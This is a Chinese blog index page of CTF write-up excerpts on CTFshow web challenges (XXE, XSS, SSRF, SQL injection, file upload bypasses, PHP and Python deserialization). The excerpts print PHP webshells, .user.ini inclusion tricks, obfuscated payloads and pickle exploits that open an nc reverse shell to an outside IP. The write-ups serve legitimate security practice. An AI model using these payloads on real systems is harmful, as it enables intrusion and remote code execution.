自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

Kradress的博客

记录我的ctf之旅

  • 博客(211)
  • 收藏
  • 关注

原创 CTFshow XXE(web373-378)

post提交,这里外部引入vps的dtd文件。抓包发现username处存在回显。base64解码拿到flag。直接套八股文,拿到flag。这里需要一个根节点来包含。这里用python脚本。这里可以外部引入一个。

2023-03-18 04:34:20 539 1

原创 CTFshow XSS(web316-333)

这里我们发现管理员才能查看用户名和密码,如果我们在注册的时候写入xss的payload,就会在用户管理界面执行我们的xss代码。这题没有过滤什么,但是如果用img的话,拿不到flag,但是referer是bot,我猜测bot触发不了img的。试试用admin的cookie修改密码,但是没有用,可能cookie失效了。这题拿cookie也看不到flag了,不过多了一个修改密码选项。随便注册一个用户test,余额只有6块,买flag要9999元。发现输出为空,说明被题目限制了,但是。可以用frame注入。

2023-03-18 02:33:40 735

原创 CTFshow SSRF(web351-360)

表示不允许私有IP地址(例如,10.0.0.0/8,172.16.0.0/12和192.168.0.0/16),而。后面要进行url编码,因为curl还会进行一次url解码。后面要进行url编码,因为curl还会进行一次url解码。显示网页内容,说明存在SSRF漏洞,那应该就是用。因为不能用私网,所以这题还是可以用。题目hint:打无密码的mysql。发现是一个登录框,抓个包看看,输入。,用于过滤和验证输入的IP地址。,这里可以用进制转换绕过。的返回结果,直接写马。的返回结果,直接写马。

2023-03-17 18:38:31 665

原创 CTFshow sql注入 上篇(web221-253)

目录前言思路题解总结前言输入源码思路################################题解################################总结…

2022-04-20 18:00:29 4701 2

原创 CTFshow sql注入 上篇(web171-220)

目录前言题目web 171(万能密码)web 172(回显内容过滤,base64或者hex编码绕过)web 173(回显内容过滤,base64或者hex编码绕过)web 174 (盲注)总结前言师傅们加油!!!题目web 171(万能密码)//拼接sql语句查找指定ID用户$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";id存在注

2022-03-18 00:24:11 7184

原创 CTFshow 文件上传 web170

目录思路总结思路感觉和上题没什么变化,可以利用.user.ini进行日志和远程文件包含.user.iniauto_prepend_file="/var/log/nginx/access.log"User-Agent注入一句话木马上传php文件,直接访问php文件,rce拿到flag总结…...

2022-02-17 01:55:43 2661

原创 CTFshow 文件上传 web169

目录思路总结思路查看源代码,要求上传zip上传zip后抓包,返回错误,把文件类型改成image/png,提示null清空全部内容,提示上传成功,文件后缀也可以任意改初步尝试发现< > ?都被过滤了,肯定不能直接写php代码了,不过可以上传php文件,就可以利用.user.ini进行日志文件包含和远程文件包含(条件需要当前目录有可执行的php文件,所以先要上传php,内容无关紧要).user.iniauto_prepend_file=http://2002459365访问上传的

2022-02-17 01:36:56 496

原创 CTFshow 文件上传 web168

目录思路总结思路先查看源代码,发现限制上传png直接上传png的图片马,回显null,发现对eval,system还有$_POST和$_GET进行过滤,$_REQUEST还可以用替换图片马中的一句话,把文件后缀改成php,成功上传<?php $_REQUEST[0]($_REQUEST[1]);?>访问/upload/shell.php,直接rce拿到flag总结…...

2022-02-17 01:09:08 389 1

原创 CTFshow 文件上传 web167

目录思路总结思路根据提示上传了包含shell的jpg文件,上传成功,点击下载文件,发现没有存在文件包含点,访问upload检查是否有可执行文件,提示没有权限,但是发现中间件是apache可以直接上传phtml,但是文件没有被成功解析.这时候可以上传.htaccess,对所有文件进行php解析<?php echo 123;eval($_POST['kradress']);?>.htaccessSethandler application/x-httpd-php<!-将该

2022-02-16 22:54:55 360

原创 CTFshow 文件上传 web166

目录思路总结思路直接在bp发包一直失败,没什么思路,查看了一下网页源代码,提示上传zip直接上传zip,显示下载文件,抓包发现url路径疑似文件包含点,返回的是一个html页面在上传的zip尾部添加shell,访问/upload/download.php?file=1048f28ab4d2da951869bc5579e7525c.zip抓包拿到flag<?php phpinfo();system("tac ../f*");?>总结没什么过滤...

2022-02-16 22:41:40 469

原创 CTFshow 文件上传 web165

目录思路总结思路上传jpg图片,返回包可以看出经过了二次渲染试了很多次,群里的jpg哪来也没成功,放弃了<?php $miniPayload = '<?php echo 123;eval($_POST[0]);?>'; if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) { die('php-gd is not installed'); }

2022-02-16 22:15:17 622 1

原创 CTFshow 文件上传 web164

目录思路总结思路 直接在burp里面改target和host的值,或者在本地发包多次尝试后,发现除了正常的png图片,都无法上传,猜测用图片马上传https://github.com/huntergregal/PNG-IDAT-Payload-Generator虽然上传成功,但把后缀改成任意字符串却被拦截,猜测是白名单.user.ini也无法正常上传,应该有其他的点可以利用.直接在网站上上传图片马后,发现显示查看图片点击查看图片后,跳转到/download.php?imag

2022-02-16 21:07:37 929 1

原创 CTFshow 文件上传 web163

目录源码思路总结源码思路先上传.user.ini上传成功GIF89aauto_prepend_file=png然后上传pngGIF89a<?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%d6%c4%c0%c1?>取反脚本$a = "dat

2022-02-16 04:02:08 647 1

原创 CTFshow 文件上传 web162

目录思路总结思路大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过.user.iniGIF89aauto_prepend_file=pngpngGIF89a<?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%

2022-02-15 23:27:05 2120 12

原创 CTFshow 文件上传 web161

目录思路总结思路直接在burp里面改target和host的值,或者在本地发包在上传.user.ini发现失败,可能对文件内容进行检测在多次尝试后,发现文件类型为image/png,文件头加上GIF89a而且文件不能太小,要多加点内容其他都和上题一样.user.iniGIF89aauto_prepend_file=shell.pngshell.png记得url解码GIF89a<?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0

2022-02-15 23:18:23 412

原创 CTFshow 文件上传 web160

目录思路总结思路直接在burp里面改target和host的值,或者在本地发包成功上传.user.iniauto_prepend_file=shell.png继续用取反来解取反脚本$a = "data://text/plain,<?php system('tac ../f*');?>";echo "~(";for ($i = 0; $i < strlen($a); $i++) { echo "%".bin2hex(~$a[$i]);}echo ")"

2022-02-15 21:30:17 585 1

原创 CTFshow 文件上传 web159

目录思路总结思路 直接在burp里面改target和host的值,或者在本地发包成功上传.user.iniauto_prepend_file=shell.png相比之前题目的过滤发现()也不能用了,不过可以用取反和异或来绕过不需要括号的函数echorequireincludeY1ng师傅的取反脚本,用data协议来执行代码<?php$a = "data://text/plain,<?php system('tac ../f*');?>";echo "~

2022-02-15 20:54:43 442

原创 CTFshow 文件上传 web158

目录思路总结思路直接在burp里面改target和host的值,或者在本地发包成功上传.user.iniauto_prepend_file=shell.png发现上题的可以直接用,直接白嫖了shell.png<?system('tac ../f*')?>总结…

2022-02-15 20:13:31 231

原创 CTFshow 文件上传 web157

目录思路总结思路直接在burp里面改target和host的值,或者在本地发包成功上传.user.iniauto_prepend_file=shell.png在上传shell.png的时候,对比上题,;和反引号也不能用了,过滤;可以用闭合php标签用?>来绕过shell.png<?system('tac ../f*')?>访问/upload,拿到flag总结…...

2022-02-15 20:08:42 520

原创 CTFshow 文件上传 web156

目录思路总结思路这次发现把shell.php改成png上传的时候,提示文件类型不合规,可能对文件头进行检测,可以利用图片马来写入shell.https://github.com/huntergregal/PNG-IDAT-Payload-Generator但是还是提示不合规,直接绕过前端验证,可以直接在burp里面改target和host的值,或者在本地发包成功上传.user.iniauto_prepend_file=shell.png在上传shell.png,发现多过滤了一个[

2022-02-15 19:53:47 2903

原创 CTFshow 文件上传 web155

目录思路总结思路其他和上题一样,发现这次不能通过改变大小写来绕过了,可以用短标签shell.png<? echo 123;eval($_POST['cmd']); ?>.user.iniauto_prepend_file=shell.png访问upload,执行rce总结…

2022-02-15 19:14:11 1499

原创 CTFshow 文件上传 web154

目录思路总结思路上传一个包含shell的png文件,发现上传失败清空文件内容,发现上传成功,可能过滤文件中的关键字,经过尝试,猜测文件对php进行过滤,可以用大小写来绕过shell.png<?phP echo 123;pHpinfo();eval($_POST['cmd']); ?>发现其他和上题一样,直接上传.user.ini.user.iniauto_prepend_file=shell.png然后访问/upload/index.php,直接RCE总结…

2022-02-15 18:58:52 422

原创 CTFshow 文件上传 web153

目录思路总结思路先上传带shell的png文件,上传成功把文件后缀改成php,上传失败,改成xxxxx上传成功,得知是黑名单过滤,上传phtml后缀,可以成功上传,但是无法解析,可以试试上传配置文件,访问upload,发现有可执行文件index.php,可以用上传.user.ini来进行文件包含(题目是nginx)user.ini.它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。条件:服务器脚本语言为PHP

2022-02-15 18:43:34 1772

原创 [BJDCTF2020]EasySearch

目录源码思路题解总结源码扫目录发现index.php.swp<?php ob_start(); //加密 function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$

2022-02-14 22:09:48 915

原创 MRCTF2020]你传你码呢

目录思路总结思路先上传一个包含shell的jpg文件发现上传成功,说明不对文件内容进行过滤改成php后缀发现上传失败,把文件后缀改成任意,上传成功,说明这里是黑名单而把后缀名改为ph的时候,仍然被拦截了,说明无法上传php文件(php3、php4、php5、phtml等)题目中间件是apche,试试上传.htacess然后再上传任意jpg访问页面,回显成功,可以直接RCE拿flag总结…...

2022-02-14 01:39:44 186

原创 [极客大挑战 2019]Upload

目录思路总结思路先上传一个包含shell的jpg文件提示不能包含<?,可以用scrpt标签执行php代码来绕过改为文件内容后上传,提示不是image,可能对文件内容做了检测,判断文件头是不是为image在文件头添加GIF89a,改后缀为gif,上传成功接下来把后缀名改成任意字符,上传成功,说明是黑名单过滤把对后缀名逐个尝试后,发现改成phtml发现可以成功上传不过没有告诉我文件路径在哪,盲猜一波 /upload/xxx访问地址,回显成功直接RCE拿到flag总结

2022-02-14 00:37:05 251

原创 [ACTF2020 新生赛]Upload

目录思路总结思路先上传一个包含shell的jpg文件上传成功,说明不对文件内容进行过滤用bp抓包把后缀改成php,被拦截,说明对文件后缀有检测接来下把文件后缀名改成任意字符,上传成功,说明是黑名单把后缀改成php3,php4,php5,phtml逐个尝试,最后phtml成功上传然后去访问上传的文件验证文件是否被解析发现页面成功显示123,就可以RCE了总结水题...

2022-02-14 00:16:37 1159

原创 CTFshow 文件上传 web152

目录思路题解总结思路提示:后端校验要严密先上传一个png,然后抓包改成php,发现直接成功了题解访问文件直接RCE总结水题

2022-02-13 02:02:13 510

原创 CTFshow 文件上传 web151

目录源码思路题解总结源码<script>layui.use('upload', function(){ var upload = layui.upload; //执行实例 var uploadInst = upload.render({ elem: '#upload' //绑定元素 ,url: '/upload/' //上传接口 ,done: function(res){ if(res.code==0){ $("#resu

2022-02-13 01:51:44 205

原创 CTFshow 反序列化 web278

目录思路题解总结思路题目提示了过滤了os.system,那么我们把system改成popen().read()题解import base64import pickleclass shell(object): def __reduce__(self): return (eval, ("__import__('os').popen('nc 119.91.26.229 9999 -e /bin/sh').read()",))k = shell()print(bas

2022-02-12 21:19:19 198

原创 CTFshow 反序列化 web277

目录源码题解总结源码查看源代码 提示pickle,得知考点是pickle反序列化题解exp试了几次不能用bash,最后用了/bin/sh,因为环境里面没有装bash,得不到响应nc连上就会自动断开import base64import pickleclass shell(object): def __reduce__(self): return (eval, ("__import__('os').system('nc 119.91.26.229 9999

2022-02-12 20:01:20 564

原创 CTFshow 反序列化 web275

目录源码思路题解总结源码<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-12-08 19:13:36# @Last Modified by: h1xa# @Last Modified time: 2020-12-08 20:08:07# @email: h1xa@ctfer.com# @link: https://ctfer.com*/highlight_file(__FILE__);c

2022-02-12 01:12:29 425

原创 CTFshow 反序列化 web274

目录源码思路题解总结源码源码中提示反序列化入口思路去网上搜下ThinkPHP 5.1相关的漏洞题解找到2个exp第一个<?phpnamespace think;abstract class Model{ protected $append = []; private $data = []; function __construct(){ //GET传参 shell $this->data = ['shell' =

2022-02-12 01:12:19 322

原创 CTFshow 反序列化 web273

目录题解总结题解两个链子都可以用exp1 flag在cookie<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2021-05-05 22:27:03# @Last Modified by: h1xa# @Last Modified time: 2021-05-05 22:39:17# @email: h1xa@ctfer.com# @link: https://ctfer.com*/names

2022-02-12 01:12:11 141

原创 CTFshow 反序列化 web272

目录题解总结题解之前的链子用不了了直接拿群里的exp<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2021-05-05 22:27:03# @Last Modified by: h1xa# @Last Modified time: 2021-05-05 22:39:17# @email: h1xa@ctfer.com# @link: https://ctfer.com*/namespace Ph

2022-02-11 22:50:01 257

原创 CTFshow 反序列化 web271

目录源码思路题解总结源码<?php/** * Laravel - A PHP Framework For Web Artisans * * @package Laravel * @author Taylor Otwell <taylor@laravel.com> */define('LARAVEL_START', microtime(true));/*|---------------------------------------------------

2022-02-11 22:29:50 622

原创 CTFshow 反序列化 web270

目录题解总结题解exp<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2021-05-03 21:55:29# @Last Modified by: h1xa# @Last Modified time: 2021-05-04 01:25:28# @email: h1xa@ctfer.com# @link: https://ctfer.com*/namespace yii\rest { clas

2022-02-11 22:08:26 211

原创 CTFshow 反序列化 web269

目录题解总结题解和上题一样<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2021-05-03 21:55:29# @Last Modified by: h1xa# @Last Modified time: 2021-05-04 01:25:28# @email: h1xa@ctfer.com# @link: https://ctfer.com*/namespace yii\rest { cl

2022-02-11 21:57:15 278

原创 CTFshow 反序列化 web268

目录思路题解总结思路发现这题和上题一样的,用之前的链子发现什么回显也没有,可能这个链子用不了了,就直接拿群里的吧题解exp<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2021-05-03 21:55:29# @Last Modified by: h1xa# @Last Modified time: 2021-05-04 01:25:28# @email: h1xa@ctfer.com# @link:

2022-02-11 21:54:43 501 1

原创 CTFshow 反序列化 web267

目录思路题解总结思路进去是一个网页,在login页面试了下密码,发现是admin:admin,成功登录,但发现没什么改变一个个页面查看源代码,最后再about页面中发现提示访问?r=site%2Fabout&view-source拿到提示///backdoor/shellunserialize(base64_decode($_GET['code']))刚开始不知道怎么去用,后面想到%2F就是/,尝试了下r=/backdoor/shell,提示要加上参数,然后思路又断了,应该是信

2022-02-11 21:12:30 1164 1

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除